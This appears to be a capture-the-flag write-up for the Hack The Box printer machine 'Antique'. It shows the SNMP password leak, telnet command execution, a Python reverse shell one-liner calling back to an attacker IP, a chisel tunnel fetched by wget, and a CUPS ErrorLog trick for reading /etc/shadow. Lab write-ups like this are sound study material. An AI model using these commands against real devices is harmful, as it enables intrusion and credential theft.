< BACK
Another write up I wrote for Hack The Box- Antique

My walkthrough for Hack The Box- Antique

Another write up I wrote for Hack The Box- Antique
Overview Skills Tools Enumeration Foothold Privilege Escalation Conclusion

Overview

Antique is an easy Linux box, or it is?
The box was created by MrR3boot and released on September 27th 2021.

Are we really looking at a Linux computer here?
Turns out this system is more specifically an IoT device designed to print on paper.
Yes! A printer!

With this box the creator wants to challenge our enumeration skills.
Can we find the flaw in this printer?

When you think about it, this is quite scary, because almost everyone I know owns a printer.
Not sure about you guys, but how often do you update the firmware in yours?

I mean, I tend to update my huge Xerox, but not everyone has the knowledge to update even the most basic HP Printer.
Let's be honest too, it isn't always the most straightforward process either.

Skills

  • Solid Linux enumeration skills
  • How to make SNMP queries
  • Experience with decoding a string
  • Very little python knowledge
  • Some understanding on how printer works
  • Good GoogleFu skills

Tools

  • nmap
  • smnpwalk
  • python
  • CyberChef
  • CUPS
  • chisel

Enumeration

Like always, let's begin our enumeration with nmap. I usually do 2 or 3 different scans depending on the boxes I work with. I will start with a quick scan allows me to quickly scan the box and get working while the longer two runs.

I would not recommend this first quick scan on a production system as it is very intrusive. It opens thousands of ports at the same time on the target machines and could potentially cause a denial of services.

When engaging with a system, whether it's for a Capture The Flag (CTF) challenge or a client project, it is crucial to be mindful of the scans performed. In the walkthrough, I have included a more detailed version of my nmap scan, which takes a bit more time to complete, should you require it.

Typically, this initial rapid scan is completed within a matter of seconds.

nmap quick

Slower version: sudo nmap -v -A -T4 -oN nmap_quick.txt 10.10.11.107

Well, that isn't a whole lot. Let's launch another scan that will check every single port, perhaps we missing something by scanning only to the top 1000 ports.

nmap full

But this doesn't bring anything we didn't already know.

This telnet server looks like nothing I have seen before.
nmap doesn't seem to be able to find its version number, that will make it harder for us to find an exploit.

Since nmap seems to think our box is an HP JetDirect printer, perhaps there is more that nmap could do for us.
Let's take a look at the UDP ports, printers will sometimes have SNMP server they use to communicate with other devices on the network.

With the command below we can peek at the top 1000 UDP ports.
Since UDP takes a long time to scan, you probably don't want to scan the whole 65 thousands available.
sudo nmap -sU -v -oN nmap_udp_quick.txt 10.10.11.107

Depending, what is going on the box at the time you are scanning you may or may not see different ports coming up as filtered.
You will however only see one port being open and that is port 161.

Foothold

Now, if we start enumerating the services we found.

Let's start with SNMP because it tends to want to give more information than owners would like.
snmpwalk -v 2c -c public 10.10.11.107

From that we can only confirm that this is a Printer.
Now if we connect to the telnet server and try different default credentials to see if we can find a way in.

But no, this doesn't work for us.

Searching HP DirectJet exploit on Google, got me on this blog: http://www.irongeek.com/i.php?page=security/networkprinterhacking
Which goes to explain in details what we're about to do here.
Basically we can send an SNMP query to the printer and it will simply give us its password.

Let's try this.
snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0

Alright we got something back, but what could this possible means?
This almost looks like Hex code but in integer format, like ASCII.

After playing a bit with the string, I found that CyberChef's From Hex receipe gave me something very interesting.

Just before some giberish we seem to be able to read P@ssw0rd@123!!123
I wonder if that could be what the password of our telnet service is...
Only one way to know for sure right? Let's try this.

Perfect! That worked.

After playing with the options a bit, we can see that we are able to run commands on the system.
And running exec id we can see that we're not running this service as root, so there will be more work ahead of us.
We can also see running exec which python3 that this box has python installed on it.

Great! I wonder if we can run a reverse shell on this?
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

We got a shell!
And after doing a ls, seems like we have our user flag as well.

Privilege Escalation

Now that we have a foothold on the system, let's see what is going on.

After looking around we can see that something is running on port 631, however it is only binded to the localhost ip 127.0.0.1.

Now, there is different way to do this.
I will be using a tool called chisel to open the port to my machine.

On my machine I will run the server.
chisel server -p 23456 --reverse

Now since we don't have that file on the box, we will have to move it.
I will copy the file to my current folder.
which chisel
cp /usr/bin/chisel ./

Then server this directory so I can wget the file on the box from my server.
wget http://10.10.14.4:8000/chisel

Now we can run the client to connect to our chisel server.
./chisel client 10.10.14.4:23456 R:631:127.0.0.1:631

From there we can use Firefox on our local machine and browse to 127.0.0.1:631 and we should be able to see the CUPS admin page.
We can see we are dealing with CUPS 1.6.1 which is vulnerable to arbritrary file exposure.
And since the server runs as root, we can pretty much read any files on the system.

To execute this, we need to run this command.
cupsctl ErrorLog="/etc/shadow"

This will tell CUPS to change the log to the shadow file. Which we can now read via our CUPS admin page.
Go to Administration and then View error log, this will display us all the password hashes on the system.

I tried to crack the password, but it was taking longer time than I wanted to spend, so I changed the ErrorLog file to be the /root/root.txt file and was able to get the root flag.

Conclusion

This one was a little bit tricky, specially at the remote escalation part.
But with research, you are able to find all these little things that will eventually get you root access on a system.

Back to top

Comments

Are you sure your want to delete this write up?

Once the write up is deleted, all of its resources and data will be permanently deleted.

Oh no.. all the comments are loaded.

Come back at a later time for new comments.

ERROR

Oups.. Something went wrong!